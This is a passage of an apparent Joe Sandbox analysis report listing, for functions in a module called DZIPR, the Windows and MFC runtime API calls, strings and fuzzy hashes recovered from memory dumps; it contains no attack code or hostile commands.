                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: File$Pointer$ErrorLastRead__aullrem_memset
                          • String ID:
                          • API String ID: 123228641-0
                          • Opcode ID: 6fe4a7196ff8b040cb05244e9987387a9350bdae7362a35242ff88e46be86bbc
                          • Instruction ID: 7cf3a9d490ddb972b91c3335666d01f70b2eeeb3747d2640ede3524e02da9c04
                          • Opcode Fuzzy Hash: 6fe4a7196ff8b040cb05244e9987387a9350bdae7362a35242ff88e46be86bbc
                          • Instruction Fuzzy Hash: 10518C71604315AFD740CF39CC40B9BB7E8EBC9758F405A2AF958E3240E770E9048BA2
                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 6C53BE14
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 6C53BE25
                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?,?,?,?), ref: 6C53BE43
                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?), ref: 6C53BE77
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BEE3
                          • _memset.LIBCMT ref: 6C53BF02
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6C53BF13
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C53BF34
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                          • String ID:
                          • API String ID: 1891723912-0
                          • Opcode ID: 228f014fddbfbc3edb6109c4a814061843b0079a2c6325c023a57d9ae95afe9d
                          • Instruction ID: 60b2504a7fe23d3866d86e15c3f414249e2f34b3ac80838d10c54d9f51c0efb4
                          • Opcode Fuzzy Hash: 228f014fddbfbc3edb6109c4a814061843b0079a2c6325c023a57d9ae95afe9d
                          • Instruction Fuzzy Hash: C7318D71500A25EFDB10EF54CC8589AB7B1FF45314B60D62AE66A9BE90DB30AD54CF80
                          APIs
                            • Part of subcall function 6C53815A: GetParent.USER32(?), ref: 6C5381AE
                            • Part of subcall function 6C53815A: GetLastActivePopup.USER32(?), ref: 6C5381BF
                            • Part of subcall function 6C53815A: IsWindowEnabled.USER32(?), ref: 6C5381D3
                            • Part of subcall function 6C53815A: EnableWindow.USER32(?,00000000), ref: 6C5381E6
                          • EnableWindow.USER32(?,00000001), ref: 6C538247
                          • GetWindowThreadProcessId.USER32(?,?), ref: 6C53825B
                          • GetCurrentProcessId.KERNEL32(?,?), ref: 6C538265
                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6C53827D
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6C5382F9
                          • EnableWindow.USER32(00000000,00000001), ref: 6C538340
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                          • String ID: 8mSl
                          • API String ID: 1877664794-2168878277
                          • Opcode ID: 723c796d7131f0a216e73190a5c11092471a10921fbd2e6ccc13168e6db81c4e
                          • Instruction ID: dcbfc914347aba37dcbb36f6a19b7d61a4832bf32c22b0ad69b42a7ca72b06f9
                          • Opcode Fuzzy Hash: 723c796d7131f0a216e73190a5c11092471a10921fbd2e6ccc13168e6db81c4e
                          • Instruction Fuzzy Hash: 6C41E171A416289BDB25CF64CC88BDA77B4FF44304F20159BF92CE6281E770DE808B96
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C53DED6
                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6C53DF00
                          • GetSystemMetrics.USER32(00000000), ref: 6C53DF17
                          • GetSystemMetrics.USER32(00000001), ref: 6C53DF1E
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6C53DF49
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                          • String ID: B$DISPLAY
                          • API String ID: 381819527-3316187204
                          • Opcode ID: 1382ac08b69fac21d679d0a1a49e8ab5d0ed8680a2546323c0cf7c79d957ac90
                          • Instruction ID: 23affb0f8cfccba515895f63010ff39bd129906dee1037deeb32135f2bae0d11
                          • Opcode Fuzzy Hash: 1382ac08b69fac21d679d0a1a49e8ab5d0ed8680a2546323c0cf7c79d957ac90
                          • Instruction Fuzzy Hash: E921D371665230AFDF108F188CC4B5B7BB9EF467A0F114126FD1C9B681E6B0D840CBA1
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6C53A20A
                          • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6C53A2F0
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C53A30D
                          • RegCloseKey.ADVAPI32(?), ref: 6C53A32D
                          • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6C53A348
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                          • String ID: Software\
                          • API String ID: 1666054129-964853688
                          • Opcode ID: 0debee371e536e0baf6e5031f52e484a55b2c0120f916265403e95e6141c142d
                          • Instruction ID: 11fde7b9123a5468bdc7e56284737536bc7e7e82c122b6ba25b0ba3d637dc2f6
                          • Opcode Fuzzy Hash: 0debee371e536e0baf6e5031f52e484a55b2c0120f916265403e95e6141c142d
                          • Instruction Fuzzy Hash: B3419231901528EBCF21DBE4DC88ADEB7B9AF89318F5416D9E009E2650EB349F84CF55
                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 6C541868
                          • GetPropW.USER32(?,AfxOldWndProc423), ref: 6C541877
                          • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6C541900
                          • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6C541907
                          • GlobalDeleteAtom.KERNEL32(?), ref: 6C541911
                            • Part of subcall function 6C540C2C: GetWindowRect.USER32(?,10000000), ref: 6C540C56
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: AtomGlobalProp$DeleteFindH_prolog3_catchRectRemoveWindow
                          • String ID: AfxOldWndProc423
                          • API String ID: 1599575004-1060338832
                          • Opcode ID: 4b63f4f23f6cbedb03ba6245ce9a9d5d7f6f6edc97f09eeb2a3f1e72ff4f8ae3
                          • Instruction ID: f0c10c98e56790bc9c3f59dc18c1c0b9ee43ae9a82a0155103993f669cf677e6
                          • Opcode Fuzzy Hash: 4b63f4f23f6cbedb03ba6245ce9a9d5d7f6f6edc97f09eeb2a3f1e72ff4f8ae3
                          • Instruction Fuzzy Hash: D3319A3244125AEBCF019FE0CC49EFF7BB8AF8A316F50841AF601A2950C735CD259BA5
                          APIs
                          • __EH_prolog3_catch_GS.LIBCMT ref: 6C53A08C
                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6C53A11A
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6C53A13D
                            • Part of subcall function 6C53A02D: __EH_prolog3.LIBCMT ref: 6C53A034
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                          • String ID: Software\Classes\
                          • API String ID: 3518408925-1121929649
                          • Opcode ID: 34be3b0bfe0354fa2c82acb861b0042a5f92d9a16fded7e120d2aa30cf550f6e
                          • Instruction ID: abfc65e4ae8c9420caf68babcd070a91467aa14b05184e2e6d117cc5a7a576fc
                          • Opcode Fuzzy Hash: 34be3b0bfe0354fa2c82acb861b0042a5f92d9a16fded7e120d2aa30cf550f6e
                          • Instruction Fuzzy Hash: 76316E31C40138EACF21ABE4DC48BDDB7B4AF49314F5412D5E85963691EB709F889F61
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6C53D0AE
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C53D0D1
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6C53D0ED
                          • RegCloseKey.ADVAPI32(?), ref: 6C53D0FD
                          • RegCloseKey.ADVAPI32(?), ref: 6C53D107
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CloseCreate$Open
                          • String ID: software
                          • API String ID: 1740278721-2010147023
                          • Opcode ID: 56f6a3d344bcc24d10678d78738d6c69a8b368b2189cfe5c6b8a394890ecff36
                          • Instruction ID: 467e8426b8987cf57056171bf8b43de841122fe61a06e38177fc768d0fc4082b
                          • Opcode Fuzzy Hash: 56f6a3d344bcc24d10678d78738d6c69a8b368b2189cfe5c6b8a394890ecff36
                          • Instruction Fuzzy Hash: D911F872D00118FBCB21DA9ACD88DDFBFBDEFC9754B5140AAF504A2121E7319A01DBA1
                          APIs
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BEB5
                          • __CxxThrowException@8.LIBCMT ref: 6C53BEBF
                            • Part of subcall function 6C54527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6C5452BD
                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6C53AF00,6C536DDD,6C5368AD,?,6C544902,?), ref: 6C53BED6
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6C53BEE3
                            • Part of subcall function 6C536D89: __CxxThrowException@8.LIBCMT ref: 6C536D9F
                          • _memset.LIBCMT ref: 6C53BF02
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6C53BF13
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C53BF34
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                          • String ID:
                          • API String ID: 356813703-0
                          • Opcode ID: 7366edf639ce011be1140403e57711d260c7e178339819381542d0ab014f2fe8
                          • Instruction ID: 9a4d4f02684ebc6ecf6fe2a7c74459741278c82cb0139ea04093946cb2ec7974
                          • Opcode Fuzzy Hash: 7366edf639ce011be1140403e57711d260c7e178339819381542d0ab014f2fe8
                          • Instruction Fuzzy Hash: 34118E74200A05EFDB10EF64CC8AC6ABBB5FF45318790D52AE65996A20DB30EC54CF50
                          APIs
                          • __getptd.LIBCMT ref: 6C54FE1A
                            • Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
                            • Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F
                          • __amsg_exit.LIBCMT ref: 6C54FE3A
                          • __lock.LIBCMT ref: 6C54FE4A
                          • InterlockedDecrement.KERNEL32(?), ref: 6C54FE67
                          • InterlockedIncrement.KERNEL32(02AB28E0), ref: 6C54FE92
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                          • String ID: $Vl
                          • API String ID: 4271482742-383207871
                          • Opcode ID: ef9c6c2e6e11b9d827e26fac3d83b8da40c49b68bec12e94979a6ac0d66069c6
                          • Instruction ID: 27e9dfba45604a8127917aa4289ac41d8dc63c6a841a1f194190b314fb104882
                          • Opcode Fuzzy Hash: ef9c6c2e6e11b9d827e26fac3d83b8da40c49b68bec12e94979a6ac0d66069c6
                          • Instruction Fuzzy Hash: 5301D632A02711DBDB519F6E8C08B9E73B0AF4572AF518309E41067F91C734A951CBD5
                          APIs
                          • SetErrorMode.KERNEL32(00000000), ref: 6C53CA85
                          • SetErrorMode.KERNEL32(00000000), ref: 6C53CA8D
                            • Part of subcall function 6C53A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6C53A6D0
                            • Part of subcall function 6C53A698: SetLastError.KERNEL32(0000006F), ref: 6C53A6E7
                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C53CADC
                          • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6C53CAEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Error$ModeModule$AddressFileHandleLastNameProc
                          • String ID: NotifyWinEvent$user32.dll
                          • API String ID: 1146408833-597752486
                          • Opcode ID: 2871eb01197d5da2c8d6b04f48c8d5fdcd87d232b05f76f5f1beb603fd41ed76
                          • Instruction ID: c276d267b8181dde6488a12163a9eb766ef649d985b2bb755c657610a9755d08
                          • Opcode Fuzzy Hash: 2871eb01197d5da2c8d6b04f48c8d5fdcd87d232b05f76f5f1beb603fd41ed76
                          • Instruction Fuzzy Hash: 9201A7716502349FCB10EFA5CC04A9A3BA8DF85314B06945AF94DD7B91EF34D844CF66
                          APIs
                          • GetSysColor.USER32(0000000F), ref: 6C53CD2E
                          • GetSysColor.USER32(00000010), ref: 6C53CD35
                          • GetSysColor.USER32(00000014), ref: 6C53CD3C
                          • GetSysColor.USER32(00000012), ref: 6C53CD43
                          • GetSysColor.USER32(00000006), ref: 6C53CD4A
                          • GetSysColorBrush.USER32(0000000F), ref: 6C53CD57
                          • GetSysColorBrush.USER32(00000006), ref: 6C53CD5E
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: Color$Brush
                          • String ID:
                          • API String ID: 2798902688-0
                          • Opcode ID: be6e616ada33f16b48445556dd70e6e86789c5b354a7fad5b4fddf48c7df363e
                          • Instruction ID: c634cd31302e619ae670cf536f4ce03265041aa1eb73626da84c20a6cd52fb1b
                          • Opcode Fuzzy Hash: be6e616ada33f16b48445556dd70e6e86789c5b354a7fad5b4fddf48c7df363e
                          • Instruction Fuzzy Hash: 5AF0FE71A407445BDB30BB724D09B47BAE1FFC4710F16092EE2458B990D6B6E441DF44
                          APIs
                          • __CreateFrameInfo.LIBCMT ref: 6C54C43E
                            • Part of subcall function 6C544FC4: __getptd.LIBCMT ref: 6C544FD2
                            • Part of subcall function 6C544FC4: __getptd.LIBCMT ref: 6C544FE0
                          • __getptd.LIBCMT ref: 6C54C448
                            • Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
                            • Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F
                          • __getptd.LIBCMT ref: 6C54C456
                          • __getptd.LIBCMT ref: 6C54C464
                          • __getptd.LIBCMT ref: 6C54C46F
                          • _CallCatchBlock2.LIBCMT ref: 6C54C495
                            • Part of subcall function 6C545069: __CallSettingFrame@12.LIBCMT ref: 6C5450B5
                            • Part of subcall function 6C54C53C: __getptd.LIBCMT ref: 6C54C54B
                            • Part of subcall function 6C54C53C: __getptd.LIBCMT ref: 6C54C559
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                          • String ID:
                          • API String ID: 1602911419-0
                          • Opcode ID: 8cbb90a18d37397dd3d3c3d9a24512fa406221f19c5193d90477cfb50472586d
                          • Instruction ID: a53667f277d6f6f9c109967ce4db0024177b42509d7e5e416289141976f1aecb
                          • Opcode Fuzzy Hash: 8cbb90a18d37397dd3d3c3d9a24512fa406221f19c5193d90477cfb50472586d
                          • Instruction Fuzzy Hash: 1711F675C04209DFDF01DFA4C844ADD7BB1FF44314F508469E814A7751EB399A199F50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: _memset
                          • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                          • API String ID: 2102423945-1093365818
                          • Opcode ID: 7c6193ff2b244424b44529b8ac17450fc49f2dafa299fe1537a90038cb56efcf
                          • Instruction ID: 08f8d95f069cdad698e46cd47d1dd3c21eec15434bf107804d8e3f8488c24130
                          • Opcode Fuzzy Hash: 7c6193ff2b244424b44529b8ac17450fc49f2dafa299fe1537a90038cb56efcf
                          • Instruction Fuzzy Hash: 56910171D01259AEDB40DF94CD85BDEBBF8AF84348F21C16AED19E6680E7748A44C7A0
                          APIs
                            • Part of subcall function 6C53C220: RtlEnterCriticalSection.NTDLL(6C5634A8), ref: 6C53C25A
                            • Part of subcall function 6C53C220: RtlInitializeCriticalSection.NTDLL(?), ref: 6C53C26C
                            • Part of subcall function 6C53C220: RtlLeaveCriticalSection.NTDLL(6C5634A8), ref: 6C53C279
                            • Part of subcall function 6C53C220: RtlEnterCriticalSection.NTDLL(?), ref: 6C53C289
                            • Part of subcall function 6C53BB0C: __EH_prolog3_catch.LIBCMT ref: 6C53BB13
                            • Part of subcall function 6C536DC1: __CxxThrowException@8.LIBCMT ref: 6C536DD7
                            • Part of subcall function 6C536DC1: __EH_prolog3.LIBCMT ref: 6C536DE4
                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6C541458
                          • FreeLibrary.KERNEL32(?), ref: 6C541468
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                          • String ID: (QVl$HtmlHelpW$hhctrl.ocx
                          • API String ID: 2853499158-2302030225
                          • Opcode ID: 96c24ccac308b219edc3d8c0788782dfb3a8bdd88d11b9eb9234a78a995f0f46
                          • Instruction ID: 85119a63be9b4d897540b76b0cef17d6b6325de34811450af5bd5650cebd1450
                          • Opcode Fuzzy Hash: 96c24ccac308b219edc3d8c0788782dfb3a8bdd88d11b9eb9234a78a995f0f46
                          • Instruction Fuzzy Hash: 2201D131140726EBCB216BA6CD04B8B3BE0AF40358F40C91AF49F95D50EB70D8609B25
                          APIs
                          • __getptd.LIBCMT ref: 6C54C17F
                            • Part of subcall function 6C54A27F: __getptd_noexit.LIBCMT ref: 6C54A282
                            • Part of subcall function 6C54A27F: __amsg_exit.LIBCMT ref: 6C54A28F
                          • __getptd.LIBCMT ref: 6C54C190
                          • __getptd.LIBCMT ref: 6C54C19E
                          Strings
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C565000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_6c530000_DZIPR.jbxd
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: MOC$csm
                          • API String ID: 803148776-1389381023
                          • Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                          • Instruction ID: 74b470b0dc5327f5f3a3d5f050ac32c8c95c89e5c4768357e4165fcf4d1902a3
                          • Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                          • Instruction Fuzzy Hash: 03E04F35518204CFD740EBB4C845B5837A4FBE9318F2581B1D40CCBB61D735E948D942
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,6C5349D6,?,00000003), ref: 6C535685
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6C5356B4
                          • GetLastError.KERNEL32 ref: 6C5356C5
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6C5356E5
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6C535709
                          Memory Dump Source
                          • Source File: 00000010.00000002.2799287220.000000006C531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C530000, based on PE: true
                          • Associated: 00000010.00000002.2799268795.000000006C530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000010.00000002.2799411743.000000006C561000.00000004.00000001.01000000.0000000A.sdmpDownload File
